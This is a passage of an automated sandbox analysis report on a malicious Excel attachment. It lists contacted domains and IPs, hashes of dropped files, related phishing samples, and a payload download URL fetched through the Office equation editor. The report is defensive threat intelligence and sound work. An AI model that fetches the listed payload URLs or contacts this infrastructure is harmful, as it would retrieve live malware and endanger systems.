          www.fashionwatchesstore.com | 104.21.61.250 | true | true | | unknown
          oryanos-env.eba-4sqpgjbe.eu-central-1.elasticbeanstalk.com | 52.57.196.177 | true | false | | high
          www.evoslancete.com | unknown | unknown | true | | unknown
          www.athara-kiano.com | unknown | unknown | true | | unknown
          www.oryanomer.com | unknown | unknown | true | | unknown
          www.overseaexpert.com | unknown | unknown | true | | unknown

          Contacted URLs

          Name | Malicious | Antivirus Detection | Reputation
          http://www.athara-kiano.com/nsag/?SFN=1e70w6qoH0iHBmxDX27vpOpA5lfYuhHzBJ3+ZXyYbvrIHeDq+MUfY30bwUf90UJ6GkTmZw==&cBb=LtD0g | true | Avira URL Cloud: safe | unknown

          URLs from Memory and Binaries
                                                                                                                          • URL Reputation: safe
                                                                                                                          unknown
                                                                                                                          http://www.google.si/explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                            high
                                                                                                                            http://www.google.cz/explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                              high
                                                                                                                              http://www.soso.com/explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                high
                                                                                                                                http://www.univision.com/explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                  high
                                                                                                                                  http://search.ebay.it/explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                    high
                                                                                                                                    http://images.joins.com/ui_c/fvc_joins.icoexplorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                      high
                                                                                                                                      http://www.asharqalawsat.com/explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      unknown
                                                                                                                                      http://busca.orange.es/explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                        high
                                                                                                                                        http://cnweb.search.live.com/results.aspx?q=explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                          high
                                                                                                                                          http://auto.search.msn.com/response.asp?MT=explorer.exe, 00000006.00000000.2195829313.000000000A330000.00000008.00000001.sdmpfalse
                                                                                                                                            high
                                                                                                                                            http://search.yahoo.co.jpexplorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            unknown
                                                                                                                                            http://www.target.com/explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                              high
                                                                                                                                              http://buscador.terra.es/explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              unknown
                                                                                                                                              http://search.orange.co.uk/favicon.icoexplorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              unknown
                                                                                                                                              http://www.iask.com/explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              unknown
                                                                                                                                              http://www.tesco.com/explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                high
                                                                                                                                                http://cgi.search.biglobe.ne.jp/explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                unknown
                                                                                                                                                http://search.seznam.cz/favicon.icoexplorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                  high
                                                                                                                                                  http://suche.freenet.de/favicon.icoexplorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                    high
                                                                                                                                                    http://search.interpark.com/explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                      high
                                                                                                                                                      http://search.ipop.co.kr/favicon.icoexplorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                      • URL Reputation: safe
                                                                                                                                                      • URL Reputation: safe
                                                                                                                                                      • URL Reputation: safe
                                                                                                                                                      unknown
                                                                                                                                                      http://investor.msn.com/explorer.exe, 00000006.00000000.2182158267.0000000003C40000.00000002.00000001.sdmpfalse
                                                                                                                                                        high
                                                                                                                                                        http://search.espn.go.com/explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                          high
                                                                                                                                                          http://www.myspace.com/favicon.icoexplorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                            high
                                                                                                                                                            http://search.centrum.cz/favicon.icoexplorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                              high
                                                                                                                                                              http://p.zhongsou.com/favicon.icoexplorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                              unknown
                                                                                                                                                              http://service2.bfast.com/explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                              • URL Reputation: safe
                                                                                                                                                              • URL Reputation: safe
                                                                                                                                                              • URL Reputation: safe
                                                                                                                                                              unknown
                                                                                                                                                              http://www.%s.comPAvbc.exe, 00000004.00000002.2166184951.0000000001FE0000.00000002.00000001.sdmp, explorer.exe, 00000006.00000000.2169244442.0000000001C70000.00000002.00000001.sdmpfalse
                                                                                                                                                              • URL Reputation: safe
                                                                                                                                                              • URL Reputation: safe
                                                                                                                                                              • URL Reputation: safe
                                                                                                                                                              low
                                                                                                                                                              http://ariadna.elmundo.es/explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                                high

                                                                                                                                                                Contacted IPs


                                                                                                                                                                Public

IP | Domain | Country | ASN | ASN Name | Malicious
103.140.251.164 | unknown | Viet Nam | 135905 | VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN | false
54.67.57.56 | unknown | United States | 16509 | AMAZON-02US | false
191.96.163.202 | unknown | Chile | 61317 | ASDETUKhttpwwwheficedcomGB | true
52.57.196.177 | unknown | United States | 16509 | AMAZON-02US | false
104.21.61.250 | unknown | United States | 13335 | CLOUDFLARENETUS | true
103.251.44.218 | unknown | Indonesia | 131775 | IDNIC-JALANET-AS-IDPTJupiterJalaArtaID | true

                                                                                                                                                                General Information

                                                                                                                                                                Joe Sandbox Version:31.0.0 Emerald
                                                                                                                                                                Analysis ID:356571
                                                                                                                                                                Start date:23.02.2021
                                                                                                                                                                Start time:10:24:37
                                                                                                                                                                Joe Sandbox Product:CloudBasic
                                                                                                                                                                Overall analysis duration:0h 10m 0s
                                                                                                                                                                Hypervisor based Inspection enabled:false
                                                                                                                                                                Report type:full
                                                                                                                                                                Sample file name:QTN3C2AF414EDF9_041873.xlsx
                                                                                                                                                                Cookbook file name:defaultwindowsofficecookbook.jbs
                                                                                                                                                                Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                                                                                                                                                Number of analysed new started processes analysed:9
                                                                                                                                                                Number of new started drivers analysed:0
                                                                                                                                                                Number of existing processes analysed:0
                                                                                                                                                                Number of existing drivers analysed:0
                                                                                                                                                                Number of injected processes analysed:1
                                                                                                                                                                Technologies:
                                                                                                                                                                • HCA enabled
                                                                                                                                                                • EGA enabled
                                                                                                                                                                • HDC enabled
                                                                                                                                                                • AMSI enabled
                                                                                                                                                                Analysis Mode:default
                                                                                                                                                                Analysis stop reason:Timeout
                                                                                                                                                                Detection:MAL
                                                                                                                                                                Classification:mal100.troj.expl.evad.winXLSX@9/12@8/6
                                                                                                                                                                EGA Information:Failed
                                                                                                                                                                HDC Information:
                                                                                                                                                                • Successful, ratio: 34.4% (good quality ratio 32.7%)
                                                                                                                                                                • Quality average: 72.5%
                                                                                                                                                                • Quality standard deviation: 29.1%
                                                                                                                                                                HCA Information:
                                                                                                                                                                • Successful, ratio: 84%
                                                                                                                                                                • Number of executed functions: 106
                                                                                                                                                                • Number of non-executed functions: 80
                                                                                                                                                                Cookbook Comments:
                                                                                                                                                                • Adjust boot time
                                                                                                                                                                • Enable AMSI
                                                                                                                                                                • Found application associated with file extension: .xlsx
                                                                                                                                                                • Found Word or Excel or PowerPoint or XPS Viewer
                                                                                                                                                                • Attach to Office via COM
                                                                                                                                                                • Scroll down
                                                                                                                                                                • Close Viewer
                                                                                                                                                                Warnings:
                                                                                                                                                                • Exclude process from analysis (whitelisted): dllhost.exe, conhost.exe

                                                                                                                                                                Simulations

                                                                                                                                                                Behavior and APIs

                                                                                                                                                                Time | Type | Description
                                                                                                                                                                10:26:11 | API Interceptor | 76x Sleep call for process: EQNEDT32.EXE modified
                                                                                                                                                                10:26:17 | API Interceptor | 34x Sleep call for process: vbc.exe modified
                                                                                                                                                                10:26:37 | API Interceptor | 212x Sleep call for process: ipconfig.exe modified
                                                                                                                                                                10:27:19 | API Interceptor | 1x Sleep call for process: explorer.exe modified

                                                                                                                                                                Joe Sandbox View / Context

                                                                                                                                                                IPs


                                                                                                                                                                Domains


                                                                                                                                                                ASN

                                                                                                                                                                RFQ# 02012021.xlsxGet hashmaliciousBrowse
                                                                                                                                                                • 181.214.31.82
                                                                                                                                                                QRN-CLJC-06112020149.xlsxGet hashmaliciousBrowse
                                                                                                                                                                • 181.214.31.82
                                                                                                                                                                RFQ#212021.xlsxGet hashmaliciousBrowse
                                                                                                                                                                • 181.214.31.82
                                                                                                                                                                RFQ #28012021.xlsxGet hashmaliciousBrowse
                                                                                                                                                                • 181.214.31.82
                                                                                                                                                                Req for Quote.xlsxGet hashmaliciousBrowse
                                                                                                                                                                • 181.214.31.82
                                                                                                                                                                RFQ.xlsxGet hashmaliciousBrowse
                                                                                                                                                                • 181.214.31.82
                                                                                                                                                                JANUARY QUOTATION FOR PRODUCT ORDER 02983H G FOR Goldolphin INDUSTRIES LTD PACKING LIST FOR 60MM.exeGet hashmaliciousBrowse
                                                                                                                                                                • 45.221.66.154
                                                                                                                                                                ACH Remittance Details.xlsGet hashmaliciousBrowse
                                                                                                                                                                • 181.214.142.116
                                                                                                                                                                ACH Remittance Details.xlsGet hashmaliciousBrowse
                                                                                                                                                                • 181.214.142.116
                                                                                                                                                                ACH Remittance Details.xlsGet hashmaliciousBrowse
                                                                                                                                                                • 181.214.142.116
                                                                                                                                                                BFSV-1F(N)_1B-8B_ANSI.exeGet hashmaliciousBrowse
                                                                                                                                                                • 45.138.49.96
                                                                                                                                                                ts1593782194000000.exeGet hashmaliciousBrowse
                                                                                                                                                                • 45.138.49.96
                                                                                                                                                                https://mysp.ac/WJKWebxcAX/../4lj3C#fCfAXmrBDFsvHupFQHQULbmkQvYGet hashmaliciousBrowse
                                                                                                                                                                • 181.214.121.98
                                                                                                                                                                VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVNMV ASIA EMERALD II.xlsxGet hashmaliciousBrowse
                                                                                                                                                                • 103.141.138.120
                                                                                                                                                                TRANSIT MANIFEST CARGO FORM.xlsxGet hashmaliciousBrowse
                                                                                                                                                                • 103.133.108.6
                                                                                                                                                                SKBMT_ 5870Z904_ Image.exeGet hashmaliciousBrowse
                                                                                                                                                                • 103.114.107.184
                                                                                                                                                                ORDER LIST.xlsxGet hashmaliciousBrowse
                                                                                                                                                                • 103.99.1.149
                                                                                                                                                                FedEx Shipment 427781339903.exeGet hashmaliciousBrowse
                                                                                                                                                                • 103.151.123.132
                                                                                                                                                                BL + PL + CI.xlsxGet hashmaliciousBrowse
                                                                                                                                                                • 103.141.138.121
                                                                                                                                                                Our New Order Feb 23 2021 at 2.70_PVV440_PDF.exeGet hashmaliciousBrowse
                                                                                                                                                                • 103.114.107.184
                                                                                                                                                                Our New Order Feb 23 2021 at 2.30_PVV440_PDF.exeGet hashmaliciousBrowse
                                                                                                                                                                • 103.114.107.184
                                                                                                                                                                Request for Quotation.exeGet hashmaliciousBrowse
                                                                                                                                                                • 103.89.88.238
                                                                                                                                                                #U007einvoice#U007eSC00978656.xlsxGet hashmaliciousBrowse
                                                                                                                                                                • 103.99.1.145
                                                                                                                                                                quote.exeGet hashmaliciousBrowse
                                                                                                                                                                • 103.89.88.238
                                                                                                                                                                Our New Order Feb 22 2021 at 2.30_PVV440_PDF.exeGet hashmaliciousBrowse
                                                                                                                                                                • 103.114.107.184
                                                                                                                                                                RFQ Manual Supersucker en Espaol.xlsxGet hashmaliciousBrowse
                                                                                                                                                                • 103.141.138.128
                                                                                                                                                                quotation10204168.dox.xlsxGet hashmaliciousBrowse
                                                                                                                                                                • 103.140.251.164
                                                                                                                                                                notice of arrival.xlsxGet hashmaliciousBrowse
                                                                                                                                                                • 103.147.184.10
                                                                                                                                                                22-2-2021 .xlsxGet hashmaliciousBrowse
                                                                                                                                                                • 103.141.138.118
                                                                                                                                                                Shipping_Document.xlsxGet hashmaliciousBrowse
                                                                                                                                                                • 103.141.138.119
                                                                                                                                                                Remittance copy.xlsxGet hashmaliciousBrowse
                                                                                                                                                                • 103.99.1.145
                                                                                                                                                                CI + PL.xlsxGet hashmaliciousBrowse
                                                                                                                                                                • 103.141.138.121
                                                                                                                                                                RFQ_Enquiry_0002379_.xlsxGet hashmaliciousBrowse
                                                                                                                                                                • 103.141.138.117

                                                                                                                                                                JA3 Fingerprints

                                                                                                                                                                No context

                                                                                                                                                                Dropped Files

                                                                                                                                                                Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\nsqE488.tmp\System.dll

                                                                                                                                                                                                        Created / dropped Files

                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\winlog[1]
                                                                                                                                                                                                        Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):217624
                                                                                                                                                                                                        Entropy (8bit):7.895818449493941
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:6144:611QTAGoul3imDxtHYB19DyzSFSxuPmxF0y:xAjul3i+xlK19JGuOUy
                                                                                                                                                                                                        MD5:2915C0AFB0B6B26A5A699965D2119F7A
                                                                                                                                                                                                        SHA1:32FDCC2E0BCFC476347078D7EA05F12D5A259BEA
                                                                                                                                                                                                        SHA-256:38B6A40D2EEDDF38695294C57971FC2EFAB81FEA95100260A2003BAA13616B83
                                                                                                                                                                                                        SHA-512:B8312043058B28C0EEDE079425D785B581AABEAE63C889DDC4382FAA2B070333FC8A6E76F7810678CB9AE96B9E52D6E48604CEF9417C565C97C0FAADFE36B953
                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 36%
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        IE Cache URL:http://algreenstdykeghestqw.dns.army/receipat/winlog.exe?platform=hootsuite
                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\1CFA2F95.jpeg
                                                                                                                                                                                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                                        File Type:gd-jpeg v1.0 (using IJG JPEG v80), quality = 90", baseline, precision 8, 700x990, frames 3
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):48770
                                                                                                                                                                                                        Entropy (8bit):7.801842363879827
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:768:uLgWImQ6AMqTeyjskbJeYnriZvApugsiKi7iszQ2rvBZzmFz3/soBqZhsglgDQPT:uLgY4MqTeywVYr+0ugbDTzQ27A3UXsgf
                                                                                                                                                                                                        MD5:AA7A56E6A97FFA9390DA10A2EC0C5805
                                                                                                                                                                                                        SHA1:200A6D7ED9F485DD5A7B9D79B596DE3ECEBD834A
                                                                                                                                                                                                        SHA-256:56B1EDECC9A282A9FAAFD95D4D9844608B1AE5CCC8731F34F8B30B3825734974
                                                                                                                                                                                                        SHA-512:A532FE4C52FED46919003A96B882AE6F7C70A3197AA57BD1E6E917F766729F7C9C1261C36F082FBE891852D083EDB2B5A34B0A325B7C1D96D6E58B0BED6C5782
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:moderate, very likely benign file
                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\5D657FE6.png
                                                                                                                                                                                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                                        File Type:PNG image data, 712 x 712, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):111378
                                                                                                                                                                                                        Entropy (8bit):7.963743447431302
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3072:AE34q7rqNP36BuuQOlx2UXdx+yx9uWqFOp:b3brGP3lujnd3Fx9Pqgp
                                                                                                                                                                                                        MD5:5ACDB72AF63832D23CED937B6B976471
                                                                                                                                                                                                        SHA1:BC754ECEF3BEC86C6AFCC1AF644190AAFC34D9B7
                                                                                                                                                                                                        SHA-256:6D73F61D9E2A5E01DEE491E4E1F8600E0409879B86DB69B193CCF31CFD517DF3
                                                                                                                                                                                                        SHA-512:FAE05526AA18F0EC0725C089A9252FEE54C995FC5D9C4590EC9DB2B0B6192AB6BD3C6CECF5703E235536433C2DAB5C0356FE95657FE9B14574C8F13320774D23
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:moderate, very likely benign file
                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\AC9322AF.jpeg
                                                                                                                                                                                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                                        File Type:gd-jpeg v1.0 (using IJG JPEG v80), quality = 90", baseline, precision 8, 700x990, frames 3
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):48770
                                                                                                                                                                                                        Entropy (8bit):7.801842363879827
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:768:uLgWImQ6AMqTeyjskbJeYnriZvApugsiKi7iszQ2rvBZzmFz3/soBqZhsglgDQPT:uLgY4MqTeywVYr+0ugbDTzQ27A3UXsgf
                                                                                                                                                                                                        MD5:AA7A56E6A97FFA9390DA10A2EC0C5805
                                                                                                                                                                                                        SHA1:200A6D7ED9F485DD5A7B9D79B596DE3ECEBD834A
                                                                                                                                                                                                        SHA-256:56B1EDECC9A282A9FAAFD95D4D9844608B1AE5CCC8731F34F8B30B3825734974
                                                                                                                                                                                                        SHA-512:A532FE4C52FED46919003A96B882AE6F7C70A3197AA57BD1E6E917F766729F7C9C1261C36F082FBE891852D083EDB2B5A34B0A325B7C1D96D6E58B0BED6C5782
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:moderate, very likely benign file
                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\C6617CE4.png
                                                                                                                                                                                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                                        File Type:PNG image data, 712 x 712, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):111378
                                                                                                                                                                                                        Entropy (8bit):7.963743447431302
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3072:AE34q7rqNP36BuuQOlx2UXdx+yx9uWqFOp:b3brGP3lujnd3Fx9Pqgp
                                                                                                                                                                                                        MD5:5ACDB72AF63832D23CED937B6B976471
                                                                                                                                                                                                        SHA1:BC754ECEF3BEC86C6AFCC1AF644190AAFC34D9B7
                                                                                                                                                                                                        SHA-256:6D73F61D9E2A5E01DEE491E4E1F8600E0409879B86DB69B193CCF31CFD517DF3
                                                                                                                                                                                                        SHA-512:FAE05526AA18F0EC0725C089A9252FEE54C995FC5D9C4590EC9DB2B0B6192AB6BD3C6CECF5703E235536433C2DAB5C0356FE95657FE9B14574C8F13320774D23
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:moderate, very likely benign file
                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E1722339.emf
                                                                                                                                                                                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                                        File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):653280
                                                                                                                                                                                                        Entropy (8bit):2.8986377906498118
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3072:634UL0tS6WB0JOqFVY5QcARI/McGdAT9kRLFdtSyUu50yknG/qc+x:04UcLe0JOqQQZR8MDdATCR3tS+jqcC
                                                                                                                                                                                                        MD5:A49BEB715E475DD3C32F25ED71346D54
                                                                                                                                                                                                        SHA1:1A455F9E7C1D969A119EE77FEEA4904D62C217BE
                                                                                                                                                                                                        SHA-256:58965E7DDEF9329510DD2E62A3DE60DEB484C897A0152EDF311E6FA01347D599
                                                                                                                                                                                                        SHA-512:8AB6D1FCF71C415245F3608C071A05063D3F7FC87BC378D98DCE9F6EA71ECD334FE60BC77BA358F3E1913B90F70D52E8973B9D90934C07316134285A0F1A20E7
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\nsgE449.tmp
                                                                                                                                                                                                        Process:C:\Users\Public\vbc.exe
                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):191404
                                                                                                                                                                                                        Entropy (8bit):7.878606044995474
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3072:2ojw9jwLSvkpGlMfLPVlYB7kc8LvmDgJkIlSFmFp1Su/2PmLNxfYhAWXNt:2ogstrYBJ9Dy3SFSxuPmWrt
                                                                                                                                                                                                        MD5:4FECDED6A29355A90A3D3B3AABBB16E4
                                                                                                                                                                                                        SHA1:F0F16D89E8D1DD35F088CB49298DEA74A3FFF53B
                                                                                                                                                                                                        SHA-256:29680AD46B1D8A090A403798300D02897B547CF3F87FE44ADA08D95C7D34406B
                                                                                                                                                                                                        SHA-512:03889A1FA29D924FD5EB1C293A8D62FAF78876EC5CCF90F7602DC92302DB1D06BC162BDE097A66E9D148C90D0B7920E539CED3D0EF3A9AB4DD230AA73DE7EC7D
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\nsqE488.tmp\System.dll
                                                                                                                                                                                                        Process:C:\Users\Public\vbc.exe
                                                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):11776
                                                                                                                                                                                                        Entropy (8bit):5.855045165595541
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:192:xPtkiQJr7V9r3HcU17S8g1w5xzWxy6j2V7i77blbTc4v:g7VpNo8gmOyRsVc4
                                                                                                                                                                                                        MD5:FCCFF8CB7A1067E23FD2E2B63971A8E1
                                                                                                                                                                                                        SHA1:30E2A9E137C1223A78A0F7B0BF96A1C361976D91
                                                                                                                                                                                                        SHA-256:6FCEA34C8666B06368379C6C402B5321202C11B00889401C743FB96C516C679E
                                                                                                                                                                                                        SHA-512:F4335E84E6F8D70E462A22F1C93D2998673A7616C868177CAC3E8784A3BE1D7D0BB96F2583FA0ED82F4F2B6B8F5D9B33521C279A42E055D80A94B4F3F1791E0C
                                                                                                                                                                                                        Malicious:false
Antivirus:
• Antivirus: Metadefender, Detection: 0%
• Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:
• Filename: lpdKSOB78u.exe, Detection: malicious
• Filename: jTmBvrBw7V.exe, Detection: malicious
• Filename: 523JHfbGM1.exe, Detection: malicious
• Filename: TAk8jeG5ob.exe, Detection: malicious
• Filename: PAYMENT COPY.exe, Detection: malicious
• Filename: ORDER LIST.xlsx, Detection: malicious
• Filename: Orderoffer.exe, Detection: malicious
• Filename: Our New Order Feb 23 2021 at 2.30_PVV440_PDF.exe, Detection: malicious
• Filename: INV_PR2201.docm, Detection: malicious
• Filename: CV-JOB REQUEST______PDF.EXE, Detection: malicious
• Filename: Request for Quotation.exe, Detection: malicious
• Filename: #U007einvoice#U007eSC00978656.xlsx, Detection: malicious
• Filename: Purchase Order___pdf ____________.exe, Detection: malicious
• Filename: quote.exe, Detection: malicious
• Filename: Order83930.exe, Detection: malicious
• Filename: Invoice 6500TH21Y5674.exe, Detection: malicious
• Filename: Invoice 6500TH21Y5674.exe, Detection: malicious
• Filename: GPP.exe, Detection: malicious
• Filename: OrderSuppliesQuote0817916.exe, Detection: malicious
• Filename: ACCOUNT DETAILS.exe, Detection: malicious
                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\tjqth.zz
                                                                                                                                                                                                        Process:C:\Users\Public\vbc.exe
                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):164352
                                                                                                                                                                                                        Entropy (8bit):7.998867839876064
                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                        SSDEEP:3072:ajw9jwLSvkpGlMfLPVlYB7kc8LvmDgJkIlSFmFp1Su/2PmLNxfYhAW2:agstrYBJ9Dy3SFSxuPmWo
                                                                                                                                                                                                        MD5:D0AA54167E81FD8C6C7CBC832E178855
                                                                                                                                                                                                        SHA1:7DEB6EB916CCDB8BDF62214F2F3026E9758CBCF6
                                                                                                                                                                                                        SHA-256:C8FD43535A87747A5046D1096717E18CE1E67D1B428498C072F011F3FA9A21E0
                                                                                                                                                                                                        SHA-512:380D39FA1D20BA78F13F91B3B5EA16B058BC864019C8608898941B723E9B04DFEAADDFAF041DC0D888388E056CA188978AEB3797A2C243313772AD83EB7FCFB7
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\z9ayiyo.dll
                                                                                                                                                                                                        Process:C:\Users\Public\vbc.exe
                                                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):11776
                                                                                                                                                                                                        Entropy (8bit):6.6898431043201
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:NEBgIVyWyVDSLUpyceXGkLF6HSFLdtyfJHxPVAcnuvmMeT8XfWJ1QhulooeUZi+w:qBnADSLwgXG7yFDixPVmxP4QPCrvLs3
                                                                                                                                                                                                        MD5:94A51F0839DE3A6F5069F766E7BDE4A7
                                                                                                                                                                                                        SHA1:19454F40631ACE4B3DE692C245E3F2551A6794D6
                                                                                                                                                                                                        SHA-256:2D78C0015CEC67CD072ACFB337075825D4A6866D5FAC1B497A649DEB2190F42C
                                                                                                                                                                                                        SHA-512:07468053EFD63FC4B404D87722E0E282B1C5C487CF97E6D858771B67B2574C90D62341FD96D3CFB94ACA6ED357E40657842ADD01E7C563AE170A65450A4EB75A
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        C:\Users\user\Desktop\~$QTN3C2AF414EDF9_041873.xlsx
                                                                                                                                                                                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):330
                                                                                                                                                                                                        Entropy (8bit):1.4377382811115937
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:vZ/FFDJw2fj/FFDJw2fV:vBFFGaFFGS
                                                                                                                                                                                                        MD5:96114D75E30EBD26B572C1FC83D1D02E
                                                                                                                                                                                                        SHA1:A44EEBDA5EB09862AC46346227F06F8CFAF19407
                                                                                                                                                                                                        SHA-256:0C6F8CF0E504C17073E4C614C8A7063F194E335D840611EEFA9E29C7CED1A523
                                                                                                                                                                                                        SHA-512:52D33C36DF2A91E63A9B1949FDC5D69E6A3610CD3855A2E3FC25017BF0A12717FC15EB8AC6113DC7D69C06AD4A83FAF0F021AD7C8D30600AA8168348BD0FA9E0
                                                                                                                                                                                                        Malicious:true
